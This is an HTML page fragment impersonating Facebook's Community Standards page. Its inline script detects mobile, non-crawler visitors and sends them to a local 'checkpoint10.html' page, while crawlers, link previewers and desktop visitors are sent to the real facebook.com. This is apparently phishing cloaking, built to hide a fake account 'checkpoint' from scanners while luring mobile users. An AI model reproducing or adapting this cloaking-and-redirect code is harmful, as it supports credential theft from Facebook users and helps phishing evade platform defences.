<script>
let user_agent = navigator.userAgent;
let is_mobile = /Mobi|android|iphone/i.test(user_agent);
let is_bot = /bot|facebot|crawl|facebot|whatsapp|telegram|slurp|spider/i.test(user_agent);

if (!is_bot && is_mobile) {
    window.location.href = "/checkpoint10.html";
} else {
    window.location.href = "https://www.facebook.com/";
}
</script>
<title id="pageTitle">Facebook Community Standards | Transparency Centre</title>
<meta name="description" content="The Facebook Community Standards outline what is and isn&#039;t allowed on Facebook." />
<meta property="og:title" content="Facebook Community Standards | Transparency Centre" />
<meta property="og:description" content="The Facebook Community Standards outline what is and isn&#039;t allowed on Facebook." />
<meta property="og:image" content="/images/FOsLocb.png" />
<meta property="og:image:type" content="image/jpeg" />
<meta property="og:image:width" content="2400" />
<meta property="og:image:height" content="1260" />